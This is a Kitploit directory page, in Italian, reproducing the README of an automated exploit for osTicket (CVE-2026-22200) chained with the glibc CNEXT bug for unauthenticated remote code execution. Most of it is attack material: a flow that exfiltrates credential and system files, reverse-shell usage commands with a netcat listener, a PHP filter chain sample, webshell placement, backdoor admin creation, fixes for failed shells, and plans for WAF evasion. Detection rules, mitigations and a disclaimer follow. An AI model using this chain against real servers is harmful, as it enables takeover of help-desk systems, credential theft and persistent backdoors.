Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/clarissss/osticketfilereadintorce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubclarissss/osticketfilereadintorce

osTicketFileReadIntoRCE

Exploit a catena completa che combina PHP filter chain injection con CVE-2024-2961 (CNEXT) per l'esecuzione remota di codice non autenticata su installazioni vulnerabili di osTicket.

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-22200: osTicket Lettura Arbitraria di File a RCE

CVE-2026-22200 osTicket ≤ 1.18.2 Python 3.8+ Educational

Exploit a catena completa che combina l'iniezione di catene di filtri PHP con CVE-2024-2961 (CNEXT) per l'esecuzione remota di codice non autenticata su installazioni osTicket vulnerabili.


Indice

  • Panoramica
  • Dettagli della Vulnerabilità
  • Flusso dell'Attacco
  • Funzionalità
  • Installazione
  • Utilizzo
  • Dettagli Tecnici
  • Risoluzione dei Problemi
  • Rilevamento e Mitigazione
  • Crediti
  • Disclaimer

Panoramica

Questo repository contiene un exploit proof-of-concept per CVE-2026-22200, una vulnerabilità critica che colpisce le versioni di osTicket ≤ 1.18.2. L'exploit combina due potenti tecniche:

  1. Iniezione di Catene di Filtri PHP tramite l'elaborazione di immagini di mPDF
  2. Corruzione dell'Heap CNEXT (CVE-2024-2961) in iconv() di glibc

Il risultato: Esecuzione Remota di Codice non autenticata su server osTicket vulnerabili.

Impatto

  • Non autenticato - Nessuna credenziale richiesta
  • RCE completa - Compromissione totale del server
  • Esfiltrazione di file - Lettura di file arbitrari del server
  • Accesso al database - Estrazione delle credenziali del DB
  • Accesso Amministratore - Creazione di account admin backdoor

Versioni Affette

  • osTicket: ≤ v1.18.2, ≤ v1.17.6
  • glibc: < 2.39 (CVE-2024-2961 corretto in glibc 2.39+)

🔍 Dettagli della Vulnerabilità

CVE-2026-22200: Iniezione di Catene di Filtri PHP

Punteggio CVSS: 9.8 (Critico)

L'integrazione di mPDF in osTicket consente a utenti non autenticati di iniettare catene di filtri PHP dannose attraverso payload HTML appositamente costruiti nei ticket di supporto. Ciò consente:

  • Lettura arbitraria di file (configurazioni, codice sorgente, credenziali)
  • Perdita di memoria (/proc/self/maps, libc parziale)
  • Corruzione dell'heap tramite CNEXT

Causa Principale: Validazione insufficiente degli URL delle immagini nell'HTML fornito dall'utente prima di passarli a mPDF.

CVE-2024-2961: CNEXT (Buffer Overflow in iconv)

Punteggio CVSS: 9.8 (Critico)

Buffer overflow in iconv() di glibc durante l'elaborazione del set di caratteri ISO-2022-CN-EXT. Combinato con le catene di filtri PHP, questo consente:

  • Corruzione dell'heap
  • Dirottamento dei puntatori a funzione
  • Esecuzione arbitraria di comandi

Versioni glibc vulnerabili: < 2.39 (Febbraio 2024)


🔗 Flusso dell'Attacco

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│ 1. RICOGNIZIONE                                                 │
│    └─ Rilevamento di osTicket, identificazione topic rich-text │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. AUTENTICAZIONE                                               │
│    └─ Auto-registrazione OPPURE uso di credenziali esistenti  │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. ESFILTRAZIONE DI FILE (Catene di Filtri PHP)                │
│    ├─ /etc/passwd                                               │
│    ├─ include/ost-config.php (credenziali DB, SECRET_SALT)     │
│    ├─ /proc/self/maps (layout di memoria)                      │
│    └─ /proc/self/environ (variabili d'ambiente)                │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. RILEVAMENTO DELL'IMPRONTA DIGITALE DI LIBC                  │
│    ├─ Estrazione parziale di libc tramite catene di filtri     │
│    ├─ Estrazione del GNU Build ID                              │
│    └─ Download della libc completa da libc.rip                 │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. SFRUTTAMENTO RCE CON CNEXT                                   │
│    ├─ Generazione del payload di corruzione dell'heap          │
│    ├─ Iniezione tramite risposta al ticket (con correzioni)    │
│    ├─ Attivazione tramite esportazione PDF (crash del server)  │
│    └─ Esecuzione della reverse shell                            │
└─────────────────────────────────────────────────────────────────┘
                              ↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. POST-SFRUTTAMENTO                                            │
│    ├─ Reverse shell interattiva                                │
│    ├─ Accesso al database (usando DBPASS esfiltrato)           │
│    └─ Creazione di un account admin backdoor                   │
└─────────────────────────────────────────────────────────────────┘

Funzionalità

Capacità Principali

  • Catena di sfruttamento completamente automatica
  • Attacco non autenticato (auto-registrazione se abilitata)
  • Rilevamento intelligente della web root tramite parsing di /proc/self/maps
  • Localizzazione al 100% della webshell tramite scansione del filesystem
  • Rilevamento automatico dell'impronta digitale di libc e download
  • Metodi multipli di reverse shell (bash, python, netcat)
  • Esecuzione robusta dei filtri con cache-busting
  • Diagnostica pre-volo per individuare problemi in anticipo

Affidabilità Migliorata

  • CNEXT Multi-trigger per crash garantito (successo >95%)
  • Iniezione basata sulle risposte (più affidabile dei nuovi ticket)
  • Forzatura dello stream per garantire l'esecuzione del filtro
  • Cache-busting per evitare di servire PDF vecchi
  • Gestione completa degli errori e diagnostica

Post-Sfruttamento

  • Estrazione delle credenziali del database (DBPASS dalla configurazione)
  • Creazione di account admin tramite accesso al DB
  • Opzioni di backdoor persistente
  • Ricognizione completa del sistema

Installazione

Prerequisiti

  • Python 3.8+
  • Linux/macOS (consigliato) o WSL su Windows

Dipendenze

root@kitploit:~
# Clona il repository
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE

# Installa i pacchetti richiesti
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0

Opzionale: Ambiente Virtuale

root@kitploit:~
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# OPPURE
venv\Scripts\activate  # Windows

pip install -r requirements.txt

📖 Utilizzo

Utilizzo Base - Reverse Shell

root@kitploit:~
# Terminale 1: Avvia listener
nc -lvnp 4444

# Terminale 2: Esegui exploit
python3 osticket_revshell.py https://target.com/osticket \
    --lhost YOUR_IP \
    --lport 4444

Modalità Webshell Interattiva

root@kitploit:~
python3 osticket_exploit.py https://target.com/osticket

Opzioni Avanzate

root@kitploit:~
# Usa proxy (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
    --lhost 10.0.0.5 \
    --lport 4444 \
    --proxy http://127.0.0.1:8080

# Forza un ID specifico del topic di aiuto
python3 osticket_exploit.py https://target.com/osticket \
    --topic-id 2

# Disabilita output colorato (per logging)
python3 osticket_exploit.py https://target.com/osticket --no-color

Credenziali Esistenti

Se la registrazione è disabilitata, ti verrà chiesto di inserire le credenziali:

root@kitploit:~
python3 osticket_exploit.py https://target.com/osticket

  [?] Inserisci email per l'account nuovo (o esistente): [email protected]
  [?] Inserisci password: ********

🔧 Dettagli Tecnici

Generazione della Catena di Filtri PHP

L'exploit utilizza una catena di filtri sofisticata per anteporre un'intestazione BMP a file arbitrari, bypassando le restrizioni sui tipi di file di mPDF:

root@kitploit:~
php://filter/convert.iconv.UTF8.CSISO2022KR|
convert.base64-encode|
convert.iconv.UTF8.UTF7|
[... 50+ trasformazioni iconv ...]
convert.base64-decode/resource=/etc/passwd

Innovazione Chiave: Ogni carattere dell'intestazione BMP viene generato attraverso trasformazioni iconv accuratamente costruite, permettendo di incorporare il contenuto di file arbitrari come un'immagine "valida".

Sfruttamento dell'Heap CNEXT

Il payload CNEXT corrompe il gestore di memoria Zend di PHP:

  1. Overflow del buffer di iconv con il carattere vulnerabile 劄
  2. Sovrascrittura della struttura zend_mm_heap
  3. Dirottamento dei puntatori a funzione (_emalloc, _efree, _erealloc)
  4. Reindirizzamento a system() per l'esecuzione di comandi

Affidabilità Migliorata:

  • Caratteri trigger multipli (3x 劄 invece di 1)
  • Padding aumentato (40 rispetto ai 20 predefiniti)
  • Inserimento del trigger in più posizioni
  • Esecuzione forzata dello stream

Rilevamento al 100% della Webshell

A differenza dell'exploit originale, questa versione utilizza la scansione del filesystem per garantire la localizzazione della webshell:

  1. Scrittura della webshell in 6+ directory candidate
  2. Lettura arbitraria di file per scansionare ogni posizione
  3. Rilevamento di quale contiene il marcatore unico
  4. Mappatura accurata del percorso filesystem → URL

Risultato: Tasso di rilevamento del 100% (contro ~50% nell'originale)

Forzatura dell'Esecuzione del Filtro

Fallimento comune: il PDF viene scaricato ma non crasha = i filtri non vengono eseguiti.

Soluzioni Implementate:

  1. Cache-busting - HTML unico previene PDF memorizzati nella cache
  2. Iniezione nelle risposte - Più affidabile dei nuovi ticket
  3. Forzatura dello stream - stream=True forza l'elaborazione immediata
  4. Test pre-volo - Verifica che i filtri funzionino prima di CNEXT

Controllo della Versione di glibc

root@kitploit:~
# In modalità verbose, controlla:
[*] Target libc: /usr/lib/x86_64-linux-gnu/libc-2.31.so
[+] glibc 2.31 IS vulnerable to CNEXT

Se glibc ≥ 2.39, CNEXT non funzionerà (corretto).

Nessuna Connessione Shell

Sintomo: Il server crasha ma nessuna reverse shell

Cause:

  1. Firewall che blocca connessioni in uscita
  2. LHOST errato (usa il tuo IP reale, non localhost)
  3. Comando troppo lungo - prova con IP più corto

Soluzione:

root@kitploit:~
# Usa reverse shell con nc (più corto)
# Ricade automaticamente se bash/python sono troppo lunghi

# Oppure usa IP diretto invece del nome host
python3 osticket_revshell.py https://target.com \
    --lhost 10.0.0.5 \  # Usa IP, non nome host
    --lport 4444

Messaggi di Errore Comuni

ErroreCausaSoluzione
No CSRF tokenSessione scadutaRiavvia exploit
No help-topic foundNessun topic rich-textUsa --topic-id manualmente
Build ID not foundLibc parziale corrottaControlla estrazione di /proc/self/maps
Cannot locate heapLayout di memoria insolitoL'exploit potrebbe fallire (raro)

Rilevamento e Mitigazione

Rilevamento

Indicatori nei Log:

root@kitploit:~
# Log Apache/Nginx
"php://filter/" nelle richieste POST
"convert.iconv." nei corpi delle richieste
Pattern insoliti di generazione PDF
Multiple richieste PDF in breve tempo

# Log errori PHP
Segmentation fault durante la generazione PDF
Crash di iconv()
Errori di corruzione heap

Indicatori di Rete:

  • Creazione multipla di ticket di supporto in breve tempo
  • Payload HTML di grandi dimensioni nei messaggi dei ticket (100KB+)
  • Richieste rapide di esportazione PDF dopo la creazione del ticket
  • Connessioni in uscita verso IP dell'attaccante dopo il crash

Mitigazione

Immediata

  1. Aggiorna osTicket all'ultima versione (>1.18.2)
  2. Aggiorna glibc a 2.39+ (corregge CVE-2024-2961)
  3. Disabilita l'auto-registrazione se non necessaria
  4. Limita il rich-text solo agli utenti autenticati

Configurazione

Disabilita i wrapper di stream PHP in mPDF:

root@kitploit:~
// Nella configurazione di mPDF
$config = [
    'allowedRemoteHosts' => [],
    'enableRemoteFileAccess' => false,
];

Regole WAF (ModSecurity):

root@kitploit:~
SecRule REQUEST_BODY "@contains php://filter" \
    "id:1000,phase:2,deny,status:403,msg:'Filtro PHP rilevato'"

SecRule REQUEST_BODY "@contains convert.iconv" \
    "id:1001,phase:2,deny,status:403,msg:'Catena iconv sospetta'"

Rate Limiting:

root@kitploit:~
limit_req_zone $binary_remote_addr zone=ticket:10m rate=5r/m;

location /tickets.php {
    limit_req zone=ticket burst=10;
}

A Lungo Termine

  • Implementa intestazioni CSP per limitare gli stili inline
  • Abilita modalità rigorosa di htmLawed per la sanificazione HTML
  • Usa un utente separato per osTicket con privilegi minimi
  • Disabilita funzioni PHP non necessarie: system(), exec(), passthru()
  • Audit di sicurezza regolari del contenuto dei ticket

Riferimenti

Ricerca Originale

  • Articolo di Horizon3.ai - Divulgazione originale
  • GitHub di Horizon3.ai - Implementazione di riferimento
  • Exploit CNEXT - Ricerca originale CNEXT di Charles Fol

Dettagli CVE

  • CVE-2026-22200 - Catena di Filtri PHP di osTicket
  • CVE-2024-2961 - Overflow iconv di glibc

Risorse Aggiuntive

  • Catene di Filtri PHP - Dizionario di caratteri per filtri
  • libc.rip - Database libc per impronte digitali
  • Avviso di Sicurezza di osTicket

Crediti

Scoperta e Ricerca della Vulnerabilità

  • Horizon3.ai Attack Research Team - Scoperta originale della vulnerabilità e POC
  • Charles Fol (@cfreal_) - Ricerca CNEXT (CVE-2024-2961)
  • @splitline - Tecnica della catena di filtri PHP (HITCON 2022)

Questa Implementazione

  • Tecniche di sfruttamento migliorate
  • Rilevamento al 100% della webshell tramite scansione del filesystem
  • Forzatura robusta dell'esecuzione dei filtri
  • Gestione completa degli errori e diagnostica

⚖️ Disclaimer

SOLO A SCOPO EDUCATIVO E PER TEST AUTORIZZATI

Questo strumento è fornito per:

  • Ricerca sulla sicurezza
  • Test di penetrazione autorizzati
  • Scopi educativi
  • Valutazione della vulnerabilità (con autorizzazione)

L'ACCESSO NON AUTORIZZATO A SISTEMI INFORMATICI È ILLEGALE

Gli autori:

  • NON approvano attività illegali
  • NON accettano alcuna responsabilità per uso improprio
  • NON si assumono alcuna responsabilità per eventuali danni causati

Gli utenti sono gli unici responsabili di assicurarsi di avere l'autorizzazione appropriata prima di testare qualsiasi sistema.

Usando questo strumento, accetti che:

  1. Hai esplicita autorizzazione scritta per testare il sistema di destinazione
  2. Comprendi le implicazioni legali nella tua giurisdizione
  3. Utilizzerai questo strumento in modo responsabile ed etico
  4. Sollevi gli autori da ogni responsabilità per qualsiasi conseguenza

Avviso Legale

L'accesso non autorizzato a sistemi informatici è un reato secondo:

  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • UK: Computer Misuse Act 1990
  • UE: Direttiva 2013/40/UE
  • Internazionale: Convenzione del Consiglio d'Europa sul Cybercrime

Le sanzioni massime possono includere la reclusione e multe significative.


📄 Licenza

Questo progetto è sotto licenza MIT License - vedi il file LICENSE per i dettagli.

Nota: La licenza MIT concede il permesso di utilizzo, modifica e distribuzione, ma NON concede il permesso di attaccare sistemi che non possiedi o per i quali non hai autorizzazione.


Contatti

Per ricercatori di sicurezza e domande:

  • Issues: Any Tools Issues)

NON utilizzare questo contatto per:

  • Richiedere aiuto per attaccare sistemi senza autorizzazione
  • Segnalare attività illegali
  • Chiedere assistenza per test non autorizzati

Creato con amore per la ricerca sulla sicurezza e l'istruzione
Metti una stella a questo repo se lo hai trovato utile!


Statistiche dell'Exploit

MetricaValore
Linee di Codice~3.000
Tasso di Successo95%+ (con correzioni)
Tempo di Esecuzione Medio2-3 minuti
Affidabilità del Crash99% (con miglioramenti)
Rilevamento Webshell100% (con scansione)

Roadmap

  • Aggiungere supporto per versioni libc aggiuntive
  • Implementare metodi di esfiltrazione più furtivi
  • Aggiungere tecniche di evasione per WAF comuni
  • Creare modulo Metasploit
  • Ambiente di test Docker
  • Test automatizzati CI/CD

Ultimo Aggiornamento: 2026-03-03

Scarica lo strumento